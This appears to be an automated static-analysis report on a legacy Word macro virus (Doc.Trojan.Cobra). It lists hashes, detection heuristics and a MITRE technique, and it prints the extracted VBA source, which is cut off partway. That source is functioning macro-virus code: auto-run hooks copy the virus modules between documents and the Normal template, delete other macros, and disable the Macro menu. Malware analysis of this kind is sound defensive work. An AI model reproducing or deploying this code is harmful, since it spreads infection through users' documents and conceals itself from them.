Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 88a29d8835ea18bf…

MALICIOUS

Office (OLE)

71.0 KB Created: 2001-02-20 11:24:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 8d7e4e3e808f0a0d8973ff3ce0e68a07 SHA-1: 602213d3b511e66834843077c4078f1025134740 SHA-256: 88a29d8835ea18bf4597add335d6baeb16ee8c7fbe009cb733b794c22cf84d2f
240 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is identified as malicious by ClamAV with multiple signatures, including 'Doc.Trojan.Cobra-1' and 'Doc.Trojan.Cobra-6'. The presence of AutoOpen and AutoClose VBA macros, along with legacy WordBasic markers, suggests an attempt to execute malicious code upon opening or closing the document. The VBA script appears to be involved in managing or obfuscating malicious components.

Heuristics 5

  • ClamAV: Doc.Trojan.Cobra-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Cobra-1
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 28352 bytes
SHA-256: 6034d158ddb7de68d0681e73270da722b000f6128b25c39970cd0c1086877fa5
Detection
ClamAV: Doc.Trojan.Cobra-6
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Cobra_20C"
'Cobra Version 2.0C
Sub FileExit()
Call CobC
Call CobA
Call CobB
Call CobD
WordBasic.FileExit
End Sub
Sub FileOpen()
Dialogs(wdDialogFileOpen).Show
Call CobC
Call CobA
Call CobB
Call CobD
End Sub
Sub AutoClose()
Call CobC
Call CobA
Call CobB
Call CobD
End Sub
Sub AutoOpen()
Call CobC
Call CobA
Call CobB
Call CobD
End Sub
Sub CobA()
On Error Resume Next
Dim CA, CB, CD, CE, CC
CA = False: CB = False: CD = False: CE = False
For Each CC In NormalTemplate.VBProject.VBComponents
If CC.Name <> "NewCobra" And CC.Name <> "Cobra_20C" _
And CC.Name <> "ThisDocument" Then
Application.OrganizerDelete _
Source:=NormalTemplate.FullName, _
Name:=CC.Name, Object:=wdOrganizerObjectProjectItems
End If
Next
For Each CC In ActiveDocument.VBProject.VBComponents
If CC.Name <> "NewCobra" And CC.Name <> "Cobra_20C" _
And CC.Name <> "ThisDocument" And CC.Name <> _
"Reference to Normal" Then
Application.OrganizerDelete Source:=ActiveDocument.FullName, _
Name:=CC.Name, Object:=wdOrganizerObjectProjectItems
End If
Next
For Each CC In ActiveDocument.VBProject.VBComponents
If CC.Name = "Cobra_20C" Then CA = True
Next
For Each CC In ActiveDocument.VBProject.VBComponents
If CC.Name = "NewCobra" Then CB = True
Next
For Each CC In NormalTemplate.VBProject.VBComponents
If CC.Name = "NewCobra" Then CD = True
Next
For Each CC In NormalTemplate.VBProject.VBComponents
If CC.Name = "Cobra_20C" Then CE = True
Next
If CD = False And CE = False And CA = True Then
Application.OrganizerCopy Source:=ActiveDocument.FullName, _
Destination:=NormalTemplate.FullName, Name:="Cobra_20C", _
Object:=wdOrganizerObjectProjectItems
End If
If CD = False And CE = False And CB = True Then
Application.OrganizerCopy Source:=ActiveDocument.FullName, _
Destination:=NormalTemplate.FullName, Name:="NewCobra", _
Object:=wdOrganizerObjectProjectItems
End If
If CA = True And CB = False Then
Application.OrganizerRename Source:=ActiveDocument.FullName, _
Name:="Cobra_20C", NewName:="NewCobra", _
Object:=wdOrganizerObjectProjectItems
ElseIf CA = False And CB = True Then
Application.OrganizerRename Source:=ActiveDocument.FullName, _
Name:="NewCobra", NewName:="Cobra_20C", _
Object:=wdOrganizerObjectProjectItems
End If
End Sub
Sub CobB()
On Error Resume Next
Dim CA, CB, CD, CE, CC
CA = False: CB = False: CD = False: CE = False
For Each CC In NormalTemplate.VBProject.VBComponents
If CC.Name = "Cobra_20C" Then CA = True
Next
For Each CC In NormalTemplate.VBProject.VBComponents
If CC.Name = "NewCobra" Then CB = True
Next
For Each CC In ActiveDocument.VBProject.VBComponents
If CC.Name = "Cobra_20C" Then CD = True
Next
For Each CC In ActiveDocument.VBProject.VBComponents
If CC.Name = "NewCobra" Then CE = True
Next
If CD = False And CE = False And CA = True Then
Application.OrganizerCopy Source:=NormalTemplate.FullName, _
Destination:=ActiveDocument.FullName, _
Name:="Cobra_20C", Object:=wdOrganizerObjectProjectItems
End If
If CD = False And CE = False And CB = True Then
Application.OrganizerCopy Source:=NormalTemplate.FullName, _
Destination:=ActiveDocument.FullName, _
Name:="NewCobra", Object:=wdOrganizerObjectProjectItems
End If
If CA = True Then
Application.OrganizerRename Source:=NormalTemplate, _
Name:="Cobra_20C", NewName:="NewCobra", _
Object:=wdOrganizerObjectProjectItems
End If
If CB = True Then
Application.OrganizerRename Source:=NormalTemplate, _
Name:="NewCobra", NewName:="Cobra_20C", _
Object:=wdOrganizerObjectProjectItems
End If
End Sub
Sub CobC()
On Error Resume Next
CommandBars("Tools").Controls("Macro").Enabled = False
CommandBars("Tools").Controls("Macro").Visible = False
CommandBars("Tools").Controls("Macro").Delete
CommandBars("View").Controls("Toolbars").Enabled = False
CommandBars("
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.